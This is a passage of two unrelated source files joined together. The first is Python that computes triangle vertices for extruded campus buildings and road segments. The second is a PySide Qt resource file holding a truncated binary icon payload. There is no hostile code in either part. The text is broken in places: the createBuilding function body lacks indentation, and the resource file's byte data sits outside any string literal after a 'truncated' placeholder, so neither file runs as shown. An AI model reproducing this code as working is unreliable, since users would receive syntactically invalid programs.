vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
#TR12 (front side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
return vertex
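# The 12 triangles above tile all six faces of a box: 12 triangles x 3 vertices
# x 3 coordinates = 108 floats, in an order suitable for drawing as plain
# triangle lists (e.g. GL_TRIANGLES).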
def createBuilding(underbackright_x, underbackright_y, underbackright_z, underbackleft_x, underbackleft_y, underbackleft_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z, tinggi):
# tinggi = 0.5
upperbackleft_x = underbackleft_x
upperbackleft_y = underbackleft_y
upperbackleft_z = underbackleft_z + tinggi
upperbackright_x = underbackright_x
upperbackright_y = underbackright_y
upperbackright_z = underbackright_z + tinggi
upperfrontright_x = underfrontright_x
upperfrontright_y = underfrontright_y
upperfrontright_z = underfrontright_z + tinggi
upperfrontleft_x = underfrontleft_x
upperfrontleft_y = underfrontleft_y
upperfrontleft_z = underfrontleft_z + tinggi
return createVertex(upperbackleft_x, upperbackleft_y, upperbackleft_z, upperbackright_x, upperbackright_y, upperbackright_z, upperfrontleft_x, upperfrontleft_y, upperfrontleft_z, upperfrontright_x, upperfrontright_y, upperfrontright_z, underbackleft_x, underbackleft_y, underbackleft_z, underbackright_x, underbackright_y, underbackright_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z)
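# createBuilding extrudes the four base ("under") corners upward by `tinggi`
# (Indonesian for "height"; `gedung` means "building") to obtain the roof
# corners, then delegates the triangle construction to createVertex.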
def createAllBuilding():
    # Height (tinggi) of each entry in list_of_gedung, in the same order
    # as the coordinate table: 20 named buildings, then 25 road segments.
    heights = [
        0.2,   # albar
        0.2,   # altim
        0.35,  # cbar
        0.35,  # ctim
        0.4,   # l5
        0.4,   # l6
        0.4,   # l7
        0.4,   # l8
        0.7,   # pau
        0.5,   # perpus
        0.4,   # mektan
        0.45,  # comlabs
        0.45,  # pln
        0.5,   # tvst
        0.5,   # oktagon
        0.65,  # labir utara
        0.65,  # labir selatan
        0.6,   # labir tengah
        0.7,   # belakang perpus
        0.7,   # belakang pau
    ] + [0.2] * 25  # jalanan (road segments)

    vertex_data = []
    for gedung, tinggi in zip(list_of_gedung, heights):
        # Each gedung entry holds the four base corners of the footprint
        # as (x, y, z) triples.
        vertex_data += createBuilding(gedung[0][0], gedung[0][1], gedung[0][2],
                                      gedung[1][0], gedung[1][1], gedung[1][2],
                                      gedung[2][0], gedung[2][1], gedung[2][2],
                                      gedung[3][0], gedung[3][1], gedung[3][2],
                                      tinggi)
    return vertex_data
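# A minimal sketch of how the flat float list returned by createAllBuilding()
# might be uploaded to the GPU. Assumptions not present in this excerpt:
# numpy and PyOpenGL are installed, a GL context is already current, and
# `uploadVertexData` is a hypothetical helper added here for illustration.
import numpy as np
from OpenGL.GL import (GL_ARRAY_BUFFER, GL_STATIC_DRAW, glBindBuffer,
                       glBufferData, glGenBuffers)

def uploadVertexData(vertex_data):
    # Pack the Python floats into a contiguous float32 array for glBufferData.
    data = np.asarray(vertex_data, dtype=np.float32)
    vbo = glGenBuffers(1)
    glBindBuffer(GL_ARRAY_BUFFER, vbo)
    glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, GL_STATIC_DRAW)
    return vbo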
# --- next record: Controls/env/Lib/site-packages/PySide/examples/tools/qtdemo/qtdemo_rc.py (repos: LoicBoileau/Projet-S4---Robot-Delta [MIT], jfveronelli/sqink [Unlicense]) ---
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Wed 14. 10 21:40:06 2015
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"..."  # binary resource payload (example-category XML listings and PNG icons); truncated in the source
U\xf1\xa7\xef\x7f\xcc\x94\xf83\x9cd\xfe\xc2f`\xa0\xed\xfd/\x0b\x19>L\x19\xe6\xa1\x0f\x01\xff\x7f3\xb0\xb02|Z\xc3\xf0\xb1\x136\x5c\xc1\x00\x89\x83p\x0b\x09\x0f=\x91\x0f\xdf\xfe031\xfe\xff\xcf\xc0\xc2\xcc\xf8\xe5\xc7\xdf\xee\xad\x0f\xfeAF\xcap\x00\x00\x00\x00\x00\xff\xff\xc2\x1e\x01\x90\xd4}\xf0\xc6\xfbm\x17_\x0bp\xb1\xfe\xf9\xf7\x9f\x91\x91\xe1\xd7\x9f\x7f\x82<\xac\xb5\x01J\xccL\x8c\xb0\x19\x95\xbf\x0c\x0c,\x0c\xdf62\xbcJb`ba`\xf8C\x1bO\x0f2\xf0\xff7\x033\x0b\xc3\x9b\x0a\x86\xcf3\x19\x18X\x18\xfe\xffa``\x80\xb4M\xcb\xbc\x15\x14D8~\xfc\xfa\xcb\xc4\xc8\xf0\xf7\xdf\x7f>N\x96cw>l\xc0\xdb*\x05\x00\x00\x00\xff\xff\xc2\x12\x01\xff\x19\x18\x18\x19\x19\xbe\xff\xfa;}\xefc\x0eV&H\xecAZ>%^\x0a\x92\x02\xec\xb0\x8a\xf7\x1f\x03\x033\xc3\x9f\xc7\x0c\xaf\xe2aM\xa0aW\xee\xe3\x04\x7f\x19\x98\x98\x18\xde\xe40\xfc\xba\xc0\xc0\xc8\xc2\xc0\xf0\x97\x91\x91\xe1?\xc3\x7f>N\x96j?%xP\xff\xfd\xff\x9f\x87\x9dy\xee\xc1go\xbf\xfc\x86\xc4\x10&\x00\x00\x00\x00\xff\xff\xc2\x16\x01\xff\xfe312.8\xfc\xec\xce\xcbo\x9c\xac\xcc\xf0\xc2\xc7^S\xd0YK\x08Q\xf12\xfcg\xf8\xff\x8b\xe1u4\xc3\xdf\x8f\x0c\x8cL\xc3\xa2\xc5I<\xf8\xcf\xc0\xc0\xc8\xf0\xff\x0f\xc3\xabh\x86\x7f\x1f \x8d\x22H\x85l \xcf\xebg$\xfa\xf1;\xb4 bcaz\xf5\xe9\xe7\xb4\xbd\x8f\x19\x19\x19\xb0\x16D\x00\x00\x00\x00\xff\xffB\x8f\x80\x7f\xff\x19\x18\x99\x18\x1f\xbf\xfb\xb1\xfa\xd4K>N\x96?\xff\xfe320\xfc\xfd\xf7\x9f\x83\x95)\xd3I\xf6?b\xa8\xef/\x03\x033\xc3\xbb\x22\x86\xaf\x87\x19\x98Y\x86\xd40\x03\xb5\xc0_\x06&\x16\x86\x9f\xd7\x18\xde$10@\xd3\x1f$\x99'\xdbK\x8b\xf0\xb0\xfd\xfe\xf3\x8f\x91\x91\xe1\xef\xbf\xff\xfc\x9c,\xdb/\xbe\xb9\xfc\xf8\x0b\x13\xb6\xae\x19\x00\x00\x00\xff\xff\xc2\xcc\x01\xff\x19\x19\x18\x16\x1cz\xf6\xf9\xc7_H#\x87\x89\x89\xf1\xd3\xf7?\xd1V\x92Jb\x9c\xff\xa0\x85\xcf_\x06\x06\x16\x86\xef{\x19>Le`\x86\x16\x82#\x11\xfc\xff\xc3\xc0\xcc\xca\xf0y=\xc3\x97\xc5\x90\xc1\x22H\xc3_\x84\x97-\xd5Q\xe6\xcb\xcf\xbf\x90\xe9\x10FF\xc6\x7f\xff\xfe\xcf=\xf8\x94\x81\x81\x01sA\x07\x00\x00\x00\xff\xffB\x89\x80\x7f\xff\x19\x98\x18\x19\x1f\xbd\xfd\xb1\xf7\xda[^\x0e\xe6\xbf\xff\xfe312|\xff\xf5WM\x82+\xceF\x0a\xa9\xc7\xcb\xc0\xf0\xff7\xc3\xbb\x12\x068w\xc4\x82\xff\x7f\x19\x18\x99\x18\xde\xd50\xfc\x83\x94\xc3\xff!#\x10\x01\xc6bfJ\xfc_~\xfc\x85\x94K<\x1c,'\xef}\xb8\xf0\xe83\x13#\x03\xda8\x1d\x00\x00\x00\xff\xffB\xcb\x01\xff\x19\x18\x18V\x9cx\xf1\xed'4\xf9322\xfe\xfe\xfb?\xd3Y\x96\x83\x95\x096\xdd\xf3\x8f\x81\x81\x99\xe1}-\xc3\x8f\x0b\x0c\x8cL#\xb2\xf0A\x06\xff\x18\x18\x19\x19~?bx\x9b\x03/\x88\x18\x18\x18\x98\x18\x19\xb2]e\x99\x99\x18\xfe3@\x97\x15\xfd\xff\xcf\xb0\xfc\xf8s\x06\x06\xf4<\x00\x00\x00\x00\xff\xffBD\x00$\xf9?~\xf7c\xfb\xc57<\x1c,\x90\xe4\xff\xf5\xe7_Cy^\x1b5A\xd8P\xf3?\x06\x06&\x86\xdf\xf7\x18>\xf6101\x8f\xb0\x8a\x17\x17\xf8\xcb\xc0\xc4\xcc\xf0y\x09\xc3\xcf\x93\x90\xde\x19\x13#\xe3\xbf\xff\xff\xb5\xa5y\xec\xd4\x05\xbf\xfc\xf8\x0bi\x83\xf2\xb03\x1f\xba\xf1\xe1\xf2\xe3/\x10Y\xb8f\x00\x00\x00\x00\xff\xffBZ\xa1\xf7\xff?\x03\x03\xc3\x8eKo>\xff\xf8\x83\x94\xfc\xff\x85\x98\x8aC\x22\x10\xa2\x88\x81\x81\x91\xe1c+\xc3\xbf\xdf\xa3\xe5\x0f\x0a\xf8\xcf\xc0\xf0\xbe\x01\x85\xcb\xc0\x10j.\xc1\xc4\xc4\x08\x9bEg\xfc\xf3\xef\xff\x96\x0b\xaf\xe1\xb2\x10\x00\x00\x00\x00\xff\xffBD\x003\x13\xe3\x8f\xdf\xffv_y\xc7\xc9\xc6\x0c\xe9\x06\x7f\xff\xf5WE\x9c\xcbVC\xf0\xff\x7f\x06f&F\xe8\xd8\xec\xcf\x93\x0c\x9f\x17201\x8d\xdc\xba\x17\x0b\xf8\xcb\xc0\xc4\xcc\xf0m\x07\xc3\xb7M\xd0L\xc0\xc4\xf8\xff?\x83\x81\x1c\xaf\x81\x1c\xef\xd7_\xd0\x9a\x80\x9b\x9d\xe9\xf0\xcd\xf7o\xbf\xfc\x86\xc7\x0a\x03\x03\x03\x00\x00\x00\xff\xff\x82F\x00\xa4\x9fv\xe8\xc6\xfb\xfb\xaf\xbfA\x8a{&F\xc6\x1f\xbf\xff\x85\x99I\xb0\xb30!e\x19F\x86\x
f7\x0d\x0c\xff\xfe\x22/n\x1d\x05P\xf0\x9f\x81\xe1}\x1d\x03\x03\x03|\xa1###C\x94\xa5\xc4\xbf\x7f\xff!mwVf\xa6W\x9f~\xed\xb8\xf4\x06\x22\x0b\xd1\x04\x00\x00\x00\xff\xff\x82\x86#d\x5cg\xcb\x85\xd7\x90Am\xc8\xc0\x83\x9c0\x87\x9b\xae\xf0\x7f\x06\x06&H\xf2g`b\xf8u\x99\xe1\xfb^\x06&\xa6\x912\xea@\x02\xf8\xcb\xc0\xc4\xcc\xf0\xf3\x22\xc3\xf7=\x0c\x0cL\xd0L\xc0\xc0`\xa9\x22\xa0)\xc5\xfd\xfd\xd7_\xc8H5;+\xd3\xce\xcbo\xfe\xfc\x85\x8f\xa41\x00\x00\x00\x00\xff\xffbb\x80\xae\x96e|\xf0\xe6\xfb\xa5G\x9f\xb9\xd8\x98!\x8d\xfd\xaf?\xff\xba\xea\x08s\xb33\xff\xfb\xf7\x1fVo32|lc\xf8\xf7{4\xf9\xe3\x04\xff\x19\x18>\xb4000@:\xac\xff\xfe\xfdgaf\xf46\x10\xfd\xf1\xfb\x1f##\xe3\xff\xff\x0c\x9c\xac\xcc\xb7_|\xbf\xf4\xf8\x0b#,\x13\x00\x00\x00\x00\xff\xffbb\x80U\xbf\x87o~\xf8\x02k}\xfe\xfb\xf7\x9f\x8b\x8d\xd9E[\x98\x81\x01\xb2\xa2\xf3\x1f\x03\x033\xc3\xdf'\x0c_710\x0d\xad\xe9uz\x82\xbf\x0cLL\x0c\xdf\x0f3\xfc\xba\x00\xcd\x04\x8c\x8c\x0c\x0c\x0c\xf6\x1a\x82\xc2<\xac\x7f\xfe\xfeg\x84.s\xffw\xf0\xc6;\x06\xd8\x127\x00\x00\x00\x00\xff\xffbb``\x80\xcc\xe2\x1f\xb8\xfe\x8e\x9d\x85\x09\xb2\xf2\xe7\xdb\xaf\x7f\x86\x0a|\xaa\x12\x5c\xd0\x9d\x08\xff\xff1000|\x9a\xca\xf0\xf7\x1b\x03#\xf3h\xe3\x07'`db\xf8\xff\x8f\xe1c\x1f\x03\x03\x03\xc3\x7f\x06H\xc7X\x8c\x8f\xcdZU\xf0\xeb\xcf\xbf\x90\xa1\x08\x0e6\xe6\xa3\xb7?|\xfb\x05\x9d\xc2\x04\x00\x00\x00\xff\xffb\x82\xd4\x15w_\x7f\xbf\xfd\xf2\x1b\x07\x1b\x13d\xf1\xfe\xef\xbf\xff\x1c4\x04\x19\xa0\x99\xe3?\x03#3\xc3\xff\x1f\x0c_\x963\xc0#c\x14`\x05\xff\xff2010|\xdb\xc8\xf0\xf7\x0d$\xa5B\x92\xb9\xa3\x96 ##de\x1b\x03;+\xd3\x93w?.?\xfe\xc2\xc0\xc0\xf0\xef\xdf\x7f\x00\x00\x00\x00\xff\xffb\x82\xa88u\xf7\xe37\xd8\xd8\xc5\x9f\xbf\xff\x05\xb9Y-T\xf9\x19\xa0\xfb[\xfe1002\xfc\xd8\xc7\xf0\xfb!\x03\xe3h\xe7\x0b?\xf8\xcf\xc0\xc8\xc2\xf0\xe7\x13\xc3\xb7\x0d\x0c\x0c\x0c\xf0R\xc8P\x81OR\x80\x1d2<\xc7\xc8\xc0\xf0\xf7\xef\xff\x13w>@4\x00\x00\x00\x00\xff\xffb\x82\xa88y\xf7#dm)\x13#\xe3\xf7\xdf\x7fuey$\xf9\xd9Q\x96\x9a~^\xcc\xf0\x9f\x11s,i\x14\xa0\x03H_\xf5\xcb\x12\x06\x06\x06H\x02\xfe\xf7\xef?\x0f;\xb3\xa9\x12\xdf\xf7_\x7f\x99\x18\x19\xff\xff\xff\xcf\xce\xcat\xe6\xfe'H[\x08\x00\x00\x00\xff\xff\xec\x981\x12@0\x00\x04\xef\x12\x932_\xe0\x0b\xfc\xbf\xd2\xfa\x83J\x81BA!B\x9c\x22\x1e\xe0\x01\xf6\x0d7\xb3skHl\xe1\xea\xe7\xdd\x15F\x10\x893\xa9.=^M\x0b\xb0P\xc0\xd1\x82\xfa\xe7\xff\x81\x1b\x14b\x874\xe5:\x94\x85\xd9T^\xca\xff\x00\xce\x9aa9\xc65\x12x\x00\x00\x00\xff\xffbb``\xb8\xf1\xfc\xdb\xdb/\xbf!k~\xfe\xff\xff\xcf\xc9\xca\xa4'\xcb\xc3\xc0\x00\x1fzc`\xf8y\x8c\xe1\xf7\xb3\x917\xebB\x1e\xf8\xcf\xc0\xc4\xcc\xf0\xe7\x1b\xc3\xf7=\x0c\x0c\x0c\x0c\xff\xffA\x96\x89jKs\xf3qB\x17\xb5333~\xf9\xf9\xf7\xea\x93/\x0c\x0c\x0c\x00\x00\x00\x00\xff\xffbb``\xb8\xf4\xe8\xf3\xaf\xbf\xff\x18\x19!\xfd\xaf\xff\x12\xfc\xec\x90\x9d-\x8c\xf01\xa0\xef\x07\x18\xfe300\x8e6\xff\x89\x04\x8c\x0c\x0c\x0c\x0c?\xf6A\x98\x90.\x97\xac\x10\xa7\x82('d\xed\x10\x03\x03\xc3\xff\xff\xff/>\xfa\xcc\xc0\xc0\x00\x00\x00\x00\xff\xffbb``x\xf8\xe6;3#\xa4\x03\xcc\xf8\xeb\xcf?E1N\x0eV&\xc8~#h\xa0\xff<\x06\xd14\x00~\x19\x8a\xe0\xff?\x06F\x06\x86\x1f'\xe1\xbb\xe1 
\x0b\xdaT%\xb8~\xfd\x85\xf4\xc8\xfe\xb323=z\xfb\x83\x81\x81\x01\x00\x00\x00\xff\xffb\xfa\xf3\xf7\xff\x837?X\x99\x19\xff\xff\xff\x0fYT\xa4*\xce\xc5\x00\xdb\x87\xc4\xc0\xc0\xc4\xf0\xef3\xc3\xaf\x8b\x0c\xf0\xe2h\x14\x10\x06\xff\x19\x18\x19\x18\xfe\xdca\xf8\xf3\x18\xb2\x8e\x11\x22\xaa&\xc1\x0d\x1fSfef|\xfa\xee\xc7\xa7\xef\x7f\x00\x00\x00\x00\xff\xffbz\xfe\xf1\xe7\xab\x8f\xbfXY\x18\xff\xffg\xf8\xff\x9f\x81\x85\x89QS\x8a\x1bf\xd0?\x06\x06\x06\x86_\x17\x19\xfe\xbc\x81L\xf7\x0c\x80_\x86$\xf8\xcf\xc0\xc0\xcc\xf0\xf7'\xc3\xcf\xd3\x0c\x0c\x0c\x0c\xff\xa1\x83q\xea\x92\x5c\x9c\xacL\xff\xfe\xfd\xff\xcf\xc0\xc0\xc2\xcc\xf8\xfe\xeb\x9f\x07o\xbe\x03\x00\x00\x00\xff\xffbz\xfa\xee\x07b\x04\xe2\xff\x7f\x0e6f\x19!\x0e\x06H\x0d\x0c)s~_e\x80\x0dZ\x8c\x02b\x01$\xc8\x7f]d````\xf8\x0fYE%)\xc0\xce\xcb\xc1\xf2\xf7\x1f\x03#\x03\x03\x13#\xe3\xcf?\xff\x1e\xbe\xf9\x01\x00\x00\x00\xff\xffbz\xf1\xf1\xd7\xdf\x7f\xd0\xfd\x98\x7f\xff\xfd\xe7\xe7d\x16\xe1ec\x80\x0e\x0110000\xfc\xba\xcc\xc00\xda\x01 \x11@\xd2\xee\xaf\xab\x0c\x0c\x0c\x0c\xb0\xed2\xfc\x9c,\xc2<\xac\x7f\xfe\xc1W\xb7\xff\x7f\xf1\xe1'\x00\x00\x00\xff\xffb\xba\xff\xfa;t\xde\x92\x81\xe1\xf7\xdf\xff\xe2\xfc\xec\xbc\x1c\xcc\x90E\xa6\xd0\x1a\xf8\xd75\x84\x89\xa3\x80X\xf0\x9f\x81\x91\x81\xe1\xf7MX=\xfc\x1f\xb2\xbcJJ\x90\xe3\xf7\xdf\xff\xd0uDL\x8c\xf7^\x7f\x07\x00\x00\x00\xff\xffbz\xf9\xf1'l\xad\x03\xe3\xdf\x7f\xff\x05\xb8X\x18\x90k\xe0\xff\xff\x18\xfe>c@\xecw\x1c\x05D\x82\xff\x0c\x0c\x0c\x0c\xff^1\xfc\xfb\x02\xe5\xff\xff\xcf\xc0\xc0 \xcc\xc3\x0a\x19m\xfb\xcf\xc0\xc0\xc4\xc8\xf0\xfa\xf3/\x00\x00\x00\x00\xff\xffbz\xf7\xf5\x0f\x13#t9\xe2\xbf\xff\x0c\x90\xf2\x07\xb1\x86\xeb\xffg\x86\xbfo\x10&\x8e\x02\xe2\x01#\x03\xc3\xdf\x0f\x0c\xff\xde200\xc0CO\x84\x97\x0d\x1a\xb6\xff\x19\x98\x98\x18?|\xfd\x03\x00\x00\x00\xff\xffb\xfa\xf0\xf57\x13$F\x18\x18\xfe\xff\xff\x0f\x89\x00\x84\x9e\xbfo\x18\xfe}\x18\xad\x00H\x07\x90\xf2\xe3\x0f\xc3\x9f\xe70.\x03\x03\x03\x83\x08/+\xb4\x02```fd\xfc\xf4\xe3\x0f\x00\x00\x00\xff\xffb\xfa\xfd\xf7?\xf2\x8eJ>Nf$#\x18\x18\xfe\xbe\x80n\xbe\x18\xcd\x01$\x03F\x86\xff\x0c\x0c\x7f\x9f100\xc0C\x8f\x8f\x83\x05vz\x00d\xd8\xff?\x00\x00\x00\xff\xffb\xfa\xf5\xe7\x1f<\x02\x18\x19\x18X\x99\xd1R\xfb\xe8\xdc/\x85\x00%\x00Y\x98Q6\x10320\x00\x00\x00\x00\xff\xffb\xfa\xf6\xeb\x1f\x13##$\x82\x98\x98\x18\x058\xe1\xc7YAr\xc0kX\x13i\x14\x90\x08 !\xfd\xe7\x15\x03\x03tv\x8c\x81\x81A\x80\x93\x05m\xf7$\x00\x00\x00\xff\xffbbD\x0d[\x8c\x82ft\xf8\x81B\x80\x12\x80\x98\xe58\x00\x00\x00\xff\xff\x1a\xed\xdf\x0e0\x00\x00\x00\x00\xff\xffB\x8f\x00\x8c\xb2f4\x07P\x08P\x02\x10\xb3(\x07\x00\x00\x00\xff\xffB\x8f\x80?h[\x99\x18\xb9\xa8\xee\xa2\x91\x05\x18\xb9\x91y\x7f0vh\x00\x00\x00\x00\xff\xffb\xe2\xe5`\xf9\x0b[z\xf5\xf7\xdf\xff\x0f\xdf\xe0\xdb\x1c\x19\x19\x18\x18\x18\x98\x04G\xbb\xc1d\x02HP3\x0b2000\xc0f\xb6>~\xfb\xf3\xf7\xef\x7f\xe4\x8a\x17\x00\x00\x00\xff\xff\x82/\x91\x83\x82\xbfh1\xc4\xc8\x011\x8c\x96.\x1d\xd6\x00\x1a\x80P\x80\x16\xbc\xff\x19\x18\x00\x00\x00\x00\xff\xffb\xe2bg\xfe\xf7\xff?\xbcpz\xfb\x05\xdeneb````\x96b`\xe2\x80\xce\xf4\x8f\x02\x12\x00#\x03\xc3?\x06&\x06\xd8y\x8c\xd0\xa2\xfe\xed\xd7\xdf\x90ia\xc8\xd2D.V&\x00\x00\x00\x00\xff\xffb\x12\xe4f\xf9\x07\xab'\x98\x18\x19\xdf|\xfe\x85b\x0e\x93\x10\x03\x93 \xcc\xc4Q@\x0a\xf8\xff\x9f\x81\x91\x83\x81\x09r\x04 4\xf4\xde|Bld\xff\xfb\xef?\x1f\x17\x0b\x00\x00\x00\xff\xffb\x12\xe2f\x85\x1ch\xf8\xff?\x03\x13\x13\xc3\xbb/\xbf\x19\xa0\x93\x01\x8c\x0c\x0c\xff\x19\x988\x18\x98\xc5F\xfbb\xa4\x03H\x0d*\xc4\xc0$\x84,\xfa\xf6\xcb/h\x05\xc0\xc8\xf0\xef?\x83 
7+\x00\x00\x00\xff\xffb\x92\x11\xe2\xf8\xff\x0f:B\xcd\xcc\xc4\xf8\xf6\xcb\xef\x7f\xff\xff\xc3*\x86\x7f\x0c\x0c\x8c\xb0L4\x0aH\x02\x8c\x0c\xff\x19\x18X\xa4\x19\x988\xa1[\xdf\x19\x19\x19\x18\x18^\x7f\xfe\xc5\xc4\x04=\x87\xe3\xdf\xbf\xffR\x02\xec\x00\x00\x00\x00\xff\xffb\x92\x17\xe1\x84\xc4\xc9\xff\xff\x0c\xacLL\xaf?\xfdz\xf7\xe5\x0f\x03\xec\xa4 \x06\x06\x06\x066=\x06\x06\x0a\x8e\x86\x1d\x99\x00\xba%C\x9b\x81\x81\x81\xe1\xff_\xc8\xe8\xff\xcf?\xff\x9e\xbd\xff\xc9\xca\xcc\x04\x99\x01\xfb\xff\x9fAA\x84\x13\x00\x00\x00\xff\xffb\x12\xe7ceea\xfc\xf7\x1fr\x0e\x16\xc3\x97\x9f\x7f!\xd5\xc0\x7fx\xcb\x87U\x8b\x81a\xb4\x1dD\x16`\xd3\x822\xfe3000\xbc\xff\xf2\xfb\xc3\xb7?,L\xd0\xc1\x7f&&F\x09\x016\x00\x00\x00\x00\xff\xffb\x92\x15\xe6\x84\x9c\xb8\xcd\xc8\xc0\xc0\xc4\xc4\xf8\xe3\xf7\xdf{\xaf\xbf3@\x97821000\xb0\xeb30\x0d\xa1\x03\x0f\x07\x07\x80,\x0db7f```\x80m\x8b|\xf8\xf6\xc7\x97\x1f\x7f \xab\xd2\xff\xfe\xfb\xcf\xc5\xc6\xac(\xca\x09\x00\x00\x00\xff\xffb\x12\xe2a\x95\x12\xe4\xf8\xf5\x071+p\xfd\xd9W\x981\x90|\xa4\xce\xc0\x22\xcf\xf0\xff\xff\xe8\xc2\x08\xa2\x01#\x03\xc3?\x06f\x01\x066C\x06\x06\x06x\xb8\xdd|\xfe\x152\xfb\x02\xd9\x00 \xca\xc7&#\xc8\x01\x00\x00\x00\xff\xffbbd`P\x10\xe5\xf8\x83\xb4b\xeb\xce\xcbo\x0c\xd0}a\xb0S\x09\xd8\x8d\x19\xfe\x8fV\x03\xc4\x03&\x86\x7f\x0c\x0cl\xba\x0cL\x82\x90\x86\x0c$\xe4n\xbe\xf8\x06\xdb\x82\xc7\xf8\xfb\xef\x7fY!vvV&\x00\x00\x00\x00\xff\xffbb``P\x16\xe3\x82\x1e\xd2\xff\x9f\x81\x8d\x85\xf1\xe1\x9b\xef\xef\xbf\xfefD\xae\x879l\x18\x18\x18F[\xa2\xc4\x02\xe8\x81~\x16\x0c\x0c\x90\xe5\x10\x0cL\x8c\x8c\xbf\xfe\xfc\xbb\xf3\xe2\x1b\x1b\x0b\x13|\x05\xa2\xa2('\x03\x03\x03\x00\x00\x00\xff\xffbb``0\x90\xe7\xe5ag\x86\xac\xd8befz\xfb\xe57d\xdd\xe8\xbf\xff\xff\xa1\xd5\x00\xa7\x0b\x03\x13\xcb\x10?\x80\x92\x8e\x00R\x01py00000B\xcf&\xbe\xf9\xfc\xeb\xd3\xf7?\xd8a+\x10Y\x99\x19\x8d\x15\xf9\x19\x18\x18\x00\x00\x00\x00\xff\xffbb``\x90\x13\xe6\x10\xe5c\xfb\x05\x9b\x1c\xfe\xfb\xef\xff\x95\xa7\xc8\xd5\xc0\x7f\x06V-\x066\xb5\xd1j\x808\xc0\xc8\xf0\xff\x1f\x03\x8b\x184\x070@\xf7 ]}\xf6\x15\xb2W\x92\x11v\xaa\x9f\x8a8'\x03\x03\x03\x00\x00\x00\xff\xffb\xfa\xf7\xef?;\x0b\x93\xb64\xcf\xcf?\xff 
\xc7\x18\xb0\xb30\x9d\xb9\xf7\xf1\xef\xbf\xff\xcc\x90\xfe0$\xe1sz\x8f\xaeP'\x0e03\xfcgd\xe0te`\xe4b`\xf8\xcb\xc0\xc0\x08\xdd\x83t\xe7#\x0b\xf4|{\xc6\x9f\xbf\xff\xa9\x8as\x09q\xb3\xfe\xff\xcf\x00\x00\x00\x00\xff\xffb\x82\xb4\xef-U\xf8!9\xe5\xff\x7f\x06\x0e6\xa6;/\xbf\xddz\xf1\x8d\x81\x11\xa9\x14\xe2\x89e`b\x1e-\x85\x88\x00\xff\x18\x18\xff3\xf0\xc4C8\x90m^\xcf?\xfc\xbc\xfc\xf8\x0b'+\xf4\x0c\x88\xdf\x7f\xff\x99+\xf3300\xfc\xfb\xff\x1f\x00\x00\x00\xff\xff\x82\xee\x113R\xe0\x13\xe4f\xfd\xfd\x17z\xec\xd3\x8f\xdf\xff\x0e\xdf|\xcf\x00\xad\x83\x99\x18\x18\xfe1\xb0\xe92\xb0\x9b@\x8e-\x1e0\xaf\x0d\x01\xc0\xc4\xf0\xff\x1f\x03\x9b\x22\x03\x87=d\xed\x0f\xa4\x07p\xe2\xce\xc7\x0f\xdf\xa0GL\xff\xfb\xff\x9f\x8b\x8d\x19\x12\x01\x8c\x8c\x0c\x00\x00\x00\x00\xff\xffb\x82\xefe5\x94\xe7\xfd\xfe\xeb\x1ft/++\xf3\xc1\x1b\xef\x7f\xfe\xf9\x07\x9d.\x80lM\xe5\xcb`\x18\x1d\x96\xc6\x0f\x18\x99\x18\xfe30\xf0$30\xb2AJ\x0b\xc8!f{\xae\xbeee\x86\xec\xc1f\xf8\xfe\xeb\x9f\xba\x14\xb7\xb28'dK$\x00\x00\x00\xff\xff\x82\xec\x94g```p\xd2\x12\x86\xdc\xd5\x01/\x85\xce\xde\xff\xc4\x089\xc7\x03r\x104w\x04\x03\x9b4\xc3\xbf\x7f\xa3U1\x0e\xc0\xc8\xf0\xff/\x033\x0f\x03o\x1a\x03\x03\x03\x03#t\xd3\xf5\xcd\x17_/>\xfa\xcc\xc5\xce\x0c9\x12\xe2\xd7\x9f\x7f\x0e\x1a\x82\xf0S\x83\x00\x00\x00\x00\xff\xff\x82\xee\x94g``0S\xe2\x17\xe3e\xfd\xf5\xe7\x1f|3*\xe4\x5c\x0f\xc8\xb9g\x0c\x0c\x7f\x18\x189\x18x\xd3\x19\xe0\xb5\xc2(@\x07\xcc\x0c\xff\xfe3\xf0D10\x8bB\xce6\x81T\xab;/\xbd\xfd\xf9\x07\xba5\xec\xef\xbf\xff\xbc\x1c,6j\x82\x0c\xb0\xee\x19\x00\x00\x00\xff\xff\x82\xdey\xf2\xef\xdf\x7fAn\x16k5\x81o\xbf\xfe21A\x0e\xb7a>r\xeb\xc3\x93w?\x98\x18!'\xef230\xfcg\xe0\xcba`\x11f\xf8\xf7w\xb4$\xc2\x00\x90)0v\x06\x81r\x08\xf7\xff\x7f\x06&&\xc6\x8f\xdf\xfe\xec\xbe\xf2\x96\x1br\x04\x0a\x13\xe3\xd7\x9f\x7f\x8d\x14x\xe5E8\xe0c\xfe\x00\x00\x00\x00\xff\xffBI\xcb\xbe\x86bl,L\x90u\x11\xccL\x8c\x9f\xbf\xffYs\xfa%\x03\x03l\xf31\xc3_\x06&A\x06\x9e\xd8\xd1\xaa\x18\x1b`f\xf8\xf7\x8f\x81\xdb\x97\x81E\x09\x92\xfc!\xbb\x1c7_x\xfd\xe2\xe3OV\x16&\xe8\x94\x0b\x03\x83\xaf\xa1\x18\x03\xd2v\x0b\x00\x00\x00\x00\xff\xff\x82\x9d\x17\xc4\xc4\xf8\xff?\x83\xae,\x8f\x81\x1c\xef\xb7_\x7f\xa0'<q\xb0l\xbf\xf8\xe6\xf5\xa7_\x8c\xd0\x13\x9e\x98\x19\x18\xfe1\x08T1\xb0\x8a3\xfc\x1f\xad\x09\x90\x01d\xf4\x8d\x8bA\xb0\x1d2\xfd\x02\xa9`\xbf\xfd\xfa\xbb\xfe\xcc+\xc4\x09d\xbf\xff\xaa\x8asY\xab\x0a\xfcg`\x80_B\x09\x00\x00\x00\xff\xffB>\xb4\xef?\x03\x03\x83\x97\xbe\xc8\xef?\xf0\x13\x9e\x18\xdf~\xf9\xbd\xe5\xc2\x1bF\xa8,#\xc3\xff\x7f\x0c\xcc\xa2\x0c\x02\x95\xb0KaG\x01\x03\x03\x03\x03\x03#3\xc3\xbf\x7f\x0c|